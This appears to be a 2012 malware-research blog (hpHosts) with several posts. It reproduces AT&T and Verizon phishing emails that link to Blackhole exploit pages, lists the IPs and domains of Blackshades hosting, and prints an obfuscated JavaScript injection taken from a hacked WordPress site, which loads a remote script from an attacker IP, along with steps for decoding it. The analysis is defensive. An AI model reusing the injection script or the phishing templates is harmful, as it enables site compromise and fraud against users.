Blog for hpHosts, and whatever else I feel like writing about ....

Thursday 26 April 2012

Historical database passed 5 million records

I am pleased and proud to announce, the historical records database has passed the 5 million record mark
Rather predictably, this has happened whilst I've been down London for InfoSec (here until later today), so no idea when it actually happened - I'm just happy to see it's happened!.

I know it sounds like a cliché, but I'd like to say thank you again to those of you using hpHosts, as you're the ones that have made this happen (don't worry, I'm crawling back to my corner now!).

Friday 20 April 2012

Blackhole exploit: The AT&T and Verizon connection

Looks like the Blackhole folk are branching out from the usual LinkedIn etc, e-mails leading to the Blackhole exploit.

Nothing new as far as the URLs and payloads themselves, but found this interesting so figured I'd pop a note on here about it.




Exported by: Outlook Export v0.1.9


From: AT&T Customer Care
E-mail:icare7@amcustomercare.att-mail.com [ - Invalid IP was passed to me ]
Date: 20/04/2012 10:55:37
Subject: Subject Skipped
**************************************************************************
Links
**************************************************************************

Link: http://viagemanimal.com.br/sHSgYd2e/index.html
Domain: viagemanimal.com.br
IP: 187.61.61.198 [ insvr1002.in.whservidor.com ]
hpHosts Status: Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://www.att.com/Common/images/email/Transactional_email/Consumer/Servicing/BRN/logo_rethinkposs.jpg
Domain: www.att.com
IP: 2.18.185.145 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://www.att.com/Common/images/email/Transactional_email/Consumer/Servicing/BRN/img_brandcloud.jpg
Domain: www.att.com
IP: 2.18.185.145 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://view.atdmt.com/action/cntcin_CustomerCareEmailPaperlessBillingEnroll_10
Domain: view.atdmt.com
IP: 65.55.33.50 [ co2aqu.atdmt.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user


**************************************************************************
Text Version
**************************************************************************


att.com <http://viagemanimal.com.br/sHSgYd2e/index.html> | Support <http://viagemanimal.com.br/sHSgYd2e/index.html> | My AT&T Account <http://viagemanimal.com.br/sHSgYd2e/index.html> Rethink Possible<http://www.att.com/Common/images/email/Transactional_email/Consumer/Servicing/BRN/logo_rethinkposs.jpg>
Your wireless bill is ready to view
Dear Customer,

Your monthly wireless bill for your account is now available online.

Total Balance Due: $1253.32

Log in <http://viagemanimal.com.br/sHSgYd2e/index.html> to myAT&T to view your bill and make a payment. Or register now <http://viagemanimal.com.br/sHSgYd2e/index.html> to manage your account online. By dialing *PAY (*729) from your wireless phone, you can check your balance or make a payment - it's free.

Smartphone users: download the free app <http://viagemanimal.com.br/sHSgYd2e/index.html> to manage your account anywhere, anytime.


Thank you,
AT&T Online Services
att.com <http://viagemanimal.com.br/sHSgYd2e/index.html>


Contact Us
AT&T Support <http://viagemanimal.com.br/sHSgYd2e/index.html> - quick & easy support is available 24/7.

Find us on Facebook <http://viagemanimal.com.br/sHSgYd2e/index.html> Talk to us on twitter <http://viagemanimal.com.br/sHSgYd2e/index.html> AT&T Community <http://viagemanimal.com.br/sHSgYd2e/index.html> Get Peace of Mind

Set up secure AutoPay from your checking account.

Learn more <http://viagemanimal.com.br/sHSgYd2e/index.html>
Go Paperless

Save time, money and the environment.

Learn more <http://viagemanimal.com.br/sHSgYd2e/index.html>
Online Deals!

Shop the Best Deals in your area for Phone, TV, Internet and Wireless.

Learn more <http://viagemanimal.com.br/sHSgYd2e/index.html>
<http://www.att.com/Common/images/email/Transactional_email/Consumer/Servicing/BRN/img_brandcloud.jpg>
Device Tutorials <http://viagemanimal.com.br/sHSgYd2e/index.html>
Information specific about your phone Smart Controls <http://viagemanimal.com.br/sHSgYd2e/index.html>
Block calls, set mobile purchase limits, manage usage, and more Payment Arrangements <http://viagemanimal.com.br/sHSgYd2e/index.html>
Explore your options for arranging a payment plan
PLEASE DO NOT REPLY TO THIS MESSAGE

2012 AT&T Intellectual Property. <http://viagemanimal.com.br/sHSgYd2e/index.html> All rights reserved. AT&T, the AT&T logo and all other AT&T marks contained herein are trademarks of AT&T Intellectual Property and/or AT&T affiliated companies. Subsidiaries and affiliates of AT&T Inc. provide products and services under the AT&T brand.
Privacy Policy <http://viagemanimal.com.br/sHSgYd2e/index.html>






<http://view.atdmt.com/action/cntcin_CustomerCareEmailPaperlessBillingEnroll_10>


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 08.00.0681.000">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<BR>
<BR>

<P><FONT SIZE=2>att.com <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>>  | Support <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>>  | My AT&T Account <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>>         Rethink Possible<<A HREF="http://www.att.com/Common/images/email/Transactional_email/Consumer/Servicing/BRN/logo_rethinkposs.jpg">http://www.att.com/Common/images/email/Transactional_email/Consumer/Servicing/BRN/logo_rethinkposs.jpg</A>>      <BR>
Your wireless bill is ready to view<BR>
Dear Customer,<BR>
<BR>
Your monthly wireless bill for your account is now available online.<BR>
<BR>
Total Balance Due: $1253.32<BR>
<BR>
Log in <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>>  to myAT&T to view your bill and make a payment. Or register now <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>>  to manage your account online. By dialing *PAY (*729) from your wireless phone, you can check your balance or make a payment - it's free.<BR>
<BR>
Smartphone users: download the free app <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>>  to manage your account anywhere, anytime.<BR>
<BR>
<BR>
Thank you,<BR>
AT&T Online Services<BR>
att.com <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>> <BR>
<BR>
<BR>
Contact Us<BR>
AT&T Support <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>>  - quick & easy support is available 24/7.<BR>
<BR>
Find us on Facebook <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>> ?? Talk to us on twitter <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>> ?? AT&T Community <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>>       Get Peace of Mind<BR>
<BR>
Set up secure AutoPay from your checking account.<BR>
<BR>
Learn more <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>> <BR>
Go Paperless<BR>
<BR>
Save time, money and the environment.<BR>
<BR>
Learn more <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>> <BR>
Online Deals!<BR>
<BR>
Shop the Best Deals in your area for Phone, TV, Internet and Wireless.<BR>
<BR>
Learn more <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>> <BR>
 <<A HREF="http://www.att.com/Common/images/email/Transactional_email/Consumer/Servicing/BRN/img_brandcloud.jpg">http://www.att.com/Common/images/email/Transactional_email/Consumer/Servicing/BRN/img_brandcloud.jpg</A>><BR>
Device Tutorials <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>><BR>
Information specific about your phone   Smart Controls <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>> <BR>
Block calls, set mobile purchase limits, manage usage, and more         Payment Arrangements <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>><BR>
Explore your options for arranging a payment plan      <BR>
PLEASE DO NOT REPLY TO THIS MESSAGE    <BR>
       <BR>
?2012 AT&T Intellectual Property. <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>>  All rights reserved. AT&T, the AT&T logo and all other AT&T marks contained herein are trademarks of AT&T Intellectual Property and/or AT&T affiliated companies. Subsidiaries and affiliates of AT&T Inc. provide products and services under the AT&T brand.<BR>
Privacy Policy <<A HREF="http://viagemanimal.com.br/sHSgYd2e/index.html">http://viagemanimal.com.br/sHSgYd2e/index.html</A>> <BR>
       <BR>
<BR>
       <BR>
<BR>
<BR>
<BR>
 <<A HREF="http://view.atdmt.com/action/cntcin_CustomerCareEmailPaperlessBillingEnroll_10">http://view.atdmt.com/action/cntcin_CustomerCareEmailPaperlessBillingEnroll_10</A>><BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <icare7@amcustomercare.att-mail.com>
Delivered-To: ceo@it-mate.co.uk
X-Spam-Flag: YES
X-Spam-Score: 4.244
X-Spam-Level: ****
X-Spam-Status: Yes, score=4.244 tagged_above=-9999 required=1.3
tests=[BAYES_00=-1.9, HTML_MESSAGE=0.001, LOTS_OF_MONEY=0.001,
RCVD_IN_BRBL_LASTEXT=1.449, RCVD_IN_PBL=3.335,
RCVD_IN_SORBS_DUL=0.001, RCVD_IN_XBL=0.375, RDNS_DYNAMIC=0.982]
autolearn=no
Received: from dynamic.gibconnect.com (30.210.208.178.dsl.dynamic.gibconnect.com [178.208.210.30])
by mail4.emailconfig.com (Postfix) with ESMTP id 43D83398182
for <ceo@it-mate.co.uk>; Fri, 20 Apr 2012 10:54:26 +0100 (BST)
Received: from apache by amcustomercare.att-mail.com with local (Exim 4.63)
(envelope-from <icare7@amcustomercare.att-mail.com>)
id 1YQGHN-1XPRIJ-HJ
for <ceo@it-mate.co.uk>; Fri, 20 Apr 2012 10:55:37 +0100
To: <ceo@it-mate.co.uk>
Subject: [SPAM] Your AT&T wireless bill is ready to view
Date: Fri, 20 Apr 2012 10:55:37 +0100
From: "AT&T Customer Care" <icare7@amcustomercare.att-mail.com>
Message-ID: <51124907C002B601BCCAA588B97850EE@amcustomercare.att-mail.com>
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="------------01020900206090605070408"









Exported by: Outlook Export v0.1.9


From: AccountNotify@verizonwireless.com
E-mail:wAccountNotify@verizonwireless.com [ 137.188.80.90 - ohtwbgdinet53-ns-top-level-domain.verizonwireless.com ]
Date: 19/04/2012 17:35:27
Subject: Subject Skipped
**************************************************************************
Links
**************************************************************************

Link: http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_top.jpg
Domain: ecrm.vzwshop.com
IP: 77.67.21.65 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_left.jpg
Domain: ecrm.vzwshop.com
IP: 77.67.21.65 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://www.verizonwireless.com/b2c/index.html?name=EMC-C-C-D-CCES-1&link=img_logo
Domain: www.verizonwireless.com
IP: 162.115.18.200 [ cascrmdinet51-ns-www.verizonwireless.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/hero.jpg
Domain: ecrm.vzwshop.com
IP: 77.67.21.65 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://sohbetsen.net/rZ84USwj/index.html
Domain: sohbetsen.net
IP: 64.120.228.188 [ 64-120-228-188.static.hostnoc.net ]
hpHosts Status: Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_top2.jpg
Domain: ecrm.vzwshop.com
IP: 77.67.21.65 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_left2.jpg
Domain: ecrm.vzwshop.com
IP: 77.67.21.65 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_right2.jpg
Domain: ecrm.vzwshop.com
IP: 77.67.21.65 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_bottom2.jpg
Domain: ecrm.vzwshop.com
IP: 77.67.21.65 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/footer.jpg
Domain: ecrm.vzwshop.com
IP: 77.67.21.65 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user

Link: http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_right.jpg
Domain: ecrm.vzwshop.com
IP: 77.67.21.40 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Skipped by user


**************************************************************************
Text Version
**************************************************************************
<http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_top.jpg>
<http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_left.jpg> Verizon Wireless <http://www.verizonwireless.com/b2c/index.html?name=EMC-C-C-D-CCES-1&link=img_logo>
IMPORTANT ACCOUNT INFORMATION FROM VERIZON WIRELESS.<http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/hero.jpg>
Your current bill for your account is now available online in My Verizon
Total Balance Due: $1801.49

Keep in mind that payments and/or adjustments made to your account after your bill was generated will not be reflected in the amount shown above.

> View and Pay Your Bill <http://sohbetsen.net/rZ84USwj/index.html>

Want to simplify payments?

> Enroll in Auto Pay <http://sohbetsen.net/rZ84USwj/index.html>


Thank you for choosing Verizon Wireless.


<http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_top2.jpg>
<http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_left2.jpg> My Verizon <http://sohbetsen.net/rZ84USwj/index.html> is also available 24/7 to assist you with:
* Viewing your usage
* Updating your plan
* Adding Account Members
* Paying your bill
* Finding accessories for your devices
* And much, much more...
<http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_right2.jpg>
<http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_bottom2.jpg>
RULE THE AIR<http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/footer.jpg>
© 2011 Verizon Wireless
Verizon Wireless | One Verizon Way | Mail Code: 180WVB | Basking Ridge, NJ 07920
We respect your privacy. Please review our privacy policy <http://sohbetsen.net/rZ84USwj/index.html> for more information

If you are not the intended recipient and feel you have received this email in error; or if you
would like to update your customer notification preferences, please click here <http://sohbetsen.net/rZ84USwj/index.html> .
<http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_right.jpg>


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 08.00.0681.000">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2> <<A HREF="http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_top.jpg">http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_top.jpg</A>>     <BR>
 <<A HREF="http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_left.jpg">http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_left.jpg</A>>     Verizon Wireless <<A HREF="http://www.verizonwireless.com/b2c/index.html?name=EMC-C-C-D-CCES-1&link=img_logo">http://www.verizonwireless.com/b2c/index.html?name=EMC-C-C-D-CCES-1&link=img_logo</A>>            <BR>
 IMPORTANT ACCOUNT INFORMATION FROM VERIZON WIRELESS.<<A HREF="http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/hero.jpg">http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/hero.jpg</A>>        <BR>
Your current bill for your account is now available online in My Verizon       <BR>
Total Balance Due: $1801.49<BR>
       <BR>
Keep in mind that payments and/or adjustments made to your account after your bill was generated will not be reflected in the amount shown above.<BR>
       <BR>
> View and Pay Your Bill <<A HREF="http://sohbetsen.net/rZ84USwj/index.html">http://sohbetsen.net/rZ84USwj/index.html</A>><BR>
       <BR>
Want to simplify payments?<BR>
       <BR>
> Enroll in Auto Pay <<A HREF="http://sohbetsen.net/rZ84USwj/index.html">http://sohbetsen.net/rZ84USwj/index.html</A>><BR>
       <BR>
       <BR>
Thank you for choosing Verizon Wireless.<BR>
<BR>
       <BR>
 <<A HREF="http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_top2.jpg">http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_top2.jpg</A>>      <BR>
 <<A HREF="http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_left2.jpg">http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_left2.jpg</A>>      My Verizon <<A HREF="http://sohbetsen.net/rZ84USwj/index.html">http://sohbetsen.net/rZ84USwj/index.html</A>>  is also available 24/7 to assist you with:       <BR>
*       Viewing your usage<BR>
*       Updating your plan<BR>
*       Adding Account Members<BR>
*       Paying your bill<BR>
*       Finding accessories for your devices<BR>
*       And much, much more...<BR>
 <<A HREF="http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_right2.jpg">http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_right2.jpg</A>>    <BR>
 <<A HREF="http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_bottom2.jpg">http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/happy_bottom2.jpg</A>>   <BR>
 RULE THE AIR<<A HREF="http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/footer.jpg">http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/footer.jpg</A>>      <BR>
© 2011 Verizon Wireless<BR>
Verizon Wireless | One Verizon Way | Mail Code: 180WVB | Basking Ridge, NJ 07920<BR>
We respect your privacy. Please review our privacy policy <<A HREF="http://sohbetsen.net/rZ84USwj/index.html">http://sohbetsen.net/rZ84USwj/index.html</A>>  for more information<BR>
<BR>
If you are not the intended recipient and feel you have received this email in error; or if you<BR>
would like to update your customer notification preferences, please click here <<A HREF="http://sohbetsen.net/rZ84USwj/index.html">http://sohbetsen.net/rZ84USwj/index.html</A>> .<BR>
 <<A HREF="http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_right.jpg">http://ecrm.vzwshop.com/2010_ECRM/consumer_ftd/10_c_c_d_09_rebr_cces_temp/imgs2/granite_right.jpg</A>>   <BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <wAccountNotify@verizonwireless.com>
Delivered-To: ceo@it-mate.co.uk
X-Spam-Flag: YES
X-Spam-Score: 12.7
X-Spam-Level: ************
X-Spam-Status: Yes, score=12.7 tagged_above=-9999 required=1.3
tests=[AV:Email.Phishing.Webmail-54=0.1, BAYES_50=0.8,
HTML_IMAGE_RATIO_04=0.556, HTML_MESSAGE=0.001,
KB_DATE_CONTAINS_TAB=2.751, KB_FAKED_THE_BAT=2.694,
LOTS_OF_MONEY=0.001, MIME_HTML_ONLY=0.723, RCVD_IN_BRBL_LASTEXT=1.449,
RCVD_IN_XBL=0.375, RDNS_NONE=0.793, TAB_IN_FROM=2.447,
T_REMOTE_IMAGE=0.01] autolearn=spam
Received: from [84.232.225.54] (unknown [84.232.225.54])
by mail4.emailconfig.com (Postfix) with ESMTP id 85BC0398172
for <ceo@it-mate.co.uk>; Thu, 19 Apr 2012 17:34:19 +0100 (BST)
Received: from [6.95.135.149] (helo=nuftrcgupp.vuffamony.ru)
by with esmtpa (Exim 4.69)
(envelope-from )
id 1MM6BG-4715mh-2F
for ceo@it-mate.co.uk; Thu, 19 Apr 2012 18:35:27 +0200
Date: Thu, 19 Apr 2012 18:35:27 +0200
From: "AccountNotify@verizonwireless.com" <wAccountNotify@verizonwireless.com>
X-Mailer: The Bat! (v3.62.03) Home
X-Priority: 3 (Normal)
Message-ID: <9393197848.708K49H1953405@hdywnjzq.vgmltebdqnuzzl.biz>
To: <ceo@it-mate.co.uk>
Subject: [SPAM] Your Bill Is Now Available
MIME-Version: 1.0
Content-Type: text/html;
charset=Windows-1252
Content-Transfer-Encoding: 7bit


Blackshades on the move again

Having been suspended from more hosts than I care to remember, Blackshades are on the move again today, having been suspended from Snelis. Their new IP belongs to Staminus, and you'll want to get it blackholed before they get the site live again. 72.8.190.93 Domains: bshades.eu blackshades.net blackshades.ru livetrafficid.biz livetrafficid.org The latter two are still showing their DNS pointing to Snelis (89.207.129.11) at the time of writing this.

Exploit me baby one more time

Okay, so I couldn't come up with a decent title, but the content is never the less, interesting. For those not already familiar with it anyway.

As usual, this only covers basic things, needed to determine where it's going.

In short, myself and my friend and fellow MDL admin, Holger, were sent a URL via the Malware Domain List contact form, letting us know the user had picked up a rather nasty trojan. You can already guess what the payload is, so I'm not going to cover that, instead, I'm only going to show you how to actually decode the code that's popped on your site.

The code is usually placed in the .js files, quite why is baffling as it makes it easy to find, but what the heck, it saves me work. In this case;

hxxp://www.saucepan.org.uk/wp-content/themes/pans/scripts/unitpngfix.js

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;


To decode this, all you need to, is pop it into Malzilla's decoder window, and modify it, so it becomes;

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
element=_0xdc8d[1];//(_0xdc8d[0]);


cls=_0xdc8d[2];
sw=_0xdc8d[3];
sh=_0xdc8d[4];
dc=_0xdc8d[5];
lc=_0xdc8d[6];
refurl=escape(_0xdc8d[7]);
ua=escape(_0xdc8d[8]);
var js=_0xdc8d[10];//(_0xdc8d[9]);
js=_0xdc8d[11]=_0xdc8d[0];
js=_0xdc8d[12]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;
var head=_0xdc8d[21];//(_0xdc8d[20])[0];
head=_0xdc8d[22]
document.write((js));


Click "Run Script", and viola - you can see where it redirects the victim to. From here, you can either follow it manually if you so wish (and remember - these things only allow access once per IP, so ensure you're both recording everything if following it, or have a few extra IPs to hand).

You could cleanup the code a bit to remove parts not required to decode it, but no point removing anymore than necessary.

Oh and Google, this new editor is absolutely rubbish!

/edit

I meant to mention, those seeing this code should be familiar not only with the code, but the IP this one redirects to - it was involved in the timthumb issue last year too;

http://www.stopthehacker.com/2011/12/08/rokbox-js-infections/

Sunday 8 April 2012

Liberty Reserve investment spam

I received an e-mail on Feb 6th (yes I know, that was two months ago, but bear with me), claiming to be from Liberty Reserve. As I have Outlook show all e-mail in plain text, I didn't see what was going on at first. I fired up Pocketknife Peek, which allows the showing of headers and such, and looked at the original HTML version - which showed exactly what was going on - Liberty Reserves own affiliates have decided fraud just isn't enough - they want to go for good ole' affiliate spam too.

This particular one links to;

hxxps://sci.libertyreserve.com/?lr_acc=U1209005

The portion after lr_acc=, is the affiliates ID.

The e-mail originated from;

IP: 62.193.15.160
IP PTR: 62.193.15.160.dpi.ir
ASN: 5618 62.193.8.0/21 DPI DP IRAN

inetnum: 62.193.15.128 - 62.193.15.191
netname: DPI-Radcom
descr: DPI IDC: Radcom Co. Servers Zone
country: IR
admin-c: AA5428-RIPE
tech-c: AA5428-RIPE
status: ASSIGNED PA
mnt-by: DPI-MNT
source: RIPE # Filtered

person: Ali Amiri
address: DP Iran Co.
address: #216 , Nejatollahi Ave.
address: Tehran, 15987
address: IRAN
phone: +98 21 88903251
fax-no: +98 21 88901713
e-mail: amiri@dpi.ir
e-mail: amoghadam@dpimail.net
nic-hdl: AA5428-RIPE
mnt-by: AAM-MNT
source: RIPE # Filtered

% Information related to '62.193.8.0/21AS5618'

route: 62.193.8.0/21
descr: DP IRAN
origin: AS5618
mnt-by: DPI-MNT
